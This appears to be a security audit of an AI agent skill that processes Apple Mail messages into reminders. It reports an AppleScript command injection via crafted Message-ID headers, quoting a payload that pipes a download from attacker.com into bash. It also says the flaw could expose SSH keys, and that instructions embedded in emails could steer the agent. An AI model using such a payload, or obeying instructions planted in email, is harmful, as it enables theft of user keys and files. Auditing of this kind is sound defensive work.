The Agent Skills Directory

[COMMAND_EXECUTION]: The scripts extract-urls.sh and extract-attachment.sh are vulnerable to command injection via malicious email headers.
Evidence: In both shell scripts, the $MESSAGE_ID variable (extracted from incoming emails) is interpolated directly into an osascript -e command string without sanitization: osascript -e "... set targetId to \"$MESSAGE_ID\" ...".
Impact: An attacker can send an email with a specifically crafted Message-ID header containing AppleScript injection (e.g., dummy" & (do shell script "curl http://attacker.com/payload | bash") & "). When the skill processes this email to extract URLs or attachments, the injected command will execute with the user's privileges.
[DATA_EXFILTRATION]: The command injection vulnerability identified above provides a direct path for the silent exfiltration of sensitive local data.
Evidence: An attacker-controlled Message-ID can trigger shell commands to read and transmit private files, such as ~/.ssh/id_rsa or the contents of the Mail.app database, to a remote server.
[PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection (Category 8).
Ingestion points: Untrusted email content (subject, from, body, and extracted URLs) is fetched via fetch-mail.applescript and extract-urls.sh.
Boundary markers: The instructions lack explicit boundary markers or instructions for the agent to ignore commands embedded within the email text.
Capability inventory: The skill has access to shell execution (osascript, bash), file system modification (Write tool), and system automation (Mail, Reminders).
Sanitization: There is no evidence of sanitization or filtering of the email content before it is processed by the LLM for action classification and reminder creation.
Impact: Malicious instructions embedded in a processed email could trick the agent into creating misleading reminders, exfiltrating information via tool calls, or ignoring its safety constraints.

mail